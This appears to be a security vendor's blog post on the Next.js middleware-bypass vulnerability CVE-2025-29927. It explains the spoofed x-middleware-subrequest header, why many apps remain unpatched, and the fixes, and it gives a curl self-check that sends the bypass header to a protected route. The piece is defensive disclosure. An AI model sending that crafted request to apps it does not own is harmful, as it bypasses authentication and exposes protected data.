CVE-2025-29927 one year later: 40% of Next.js apps still vulnerable
The Next.js middleware-bypass vulnerability was disclosed in March 2025 and patched within 24 hours. One year later, forty percent of public Next.js apps are still running vulnerable versions. Here is why, and the two-minute check to run on yours.
CVE-2025-29927 is arguably the single most impactful Next.js vulnerability of the last five years: a 9.1 CVSS score, an unauthenticated attacker bypassing any middleware (including auth) with one HTTP header. Vercel patched it on the same day. Datadog Security Labs published a clear disassembly of the bug the following week.
And yet.
Industry estimates suggest that roughly 40% of public Next.js apps remain vulnerable to this one-request unauthenticated middleware bypass — long after the patch shipped.
How the bug works
Next.js middleware uses an internal header, x-middleware-subrequest, to prevent infinite recursion when middleware re-invokes itself. Before the patch, receiving this header from a client was enough to tell Next.js "this is a sub-invocation, skip the middleware." An attacker who sends the header bypasses every middleware — auth, rate limiting, geo-blocking — in one call.
Why it is still live
Three reasons:
1. Self-hosted Next.js is upgrade-heavy. Vercel-hosted apps got patched instantly. Self-hosters on Docker, AWS, or K8s still run whatever version they pinned. 2. Tests for this bug are invisible. Unit tests of your middleware still pass. The bug is in the Next.js internals; your code did nothing wrong. 3. There is no default scanner. Snyk detects dependency CVEs but does not check runtime behavior. GitHub Advanced Security checks CodeQL patterns, not live URLs.
Check your app yourself in under two minutes
Send one crafted request to your own app: curl -H "x-middleware-subrequest: src/middleware" https://your-app/admin (replace with any middleware-protected route). If the response is the protected page instead of a redirect, you're vulnerable. Request Securie access for an automated sweep when your repo is enabled.
If you are vulnerable, the fixes in priority order:
1. Upgrade Next.js to 15.2.3, 14.2.25, 13.5.9, or 12.3.5 depending on your major version.
2. Block the header at your edge if you cannot upgrade today. On Vercel: add a rewrite that rejects x-middleware-subrequest. On Cloudflare: a single worker rule.
3. Audit every middleware-gated route for unexpected 200 responses with that header set.
Longer term
Middleware should not be your primary auth boundary. Use it for rate limiting and geo rules, but verify identity inside the route handler itself. Defense in depth means the CVE-2025-29927 class of bug degrades from "critical" to "medium" even when a fresh one ships.
Related posts
We ran 500 authentication-related prompts against Claude Opus 4.7, GPT-5.4, Gemini 2.5, and DeepSeek V3.2. 92% of the generated code had at least one security bug. Here is the catalog of the top seven recurring mistakes.
Moltbook leaked 1.5 million API keys, 35,000 emails, and 4,060 private messages in 72 hours. Wiz's disclosure showed the root cause: a single Supabase table without row-level security. Here is the timeline, the exact bug, and the ten-minute hardening walkthrough for your own app.
We reran the 2025 study against Claude Opus 4.7, GPT-5.4, Gemini 2.5, and DeepSeek V3.2. The share of insecure suggestions has improved — but only when the prompt asks for security. The prompts that reliably produce safer code are short and we have them in this post.
Every major study in the last twelve months has measured the same thing: 40 to 62 percent of code produced by modern AI assistants contains a real security vulnerability. Here is what that looks like in practice, and why traditional SAST tools miss most of it.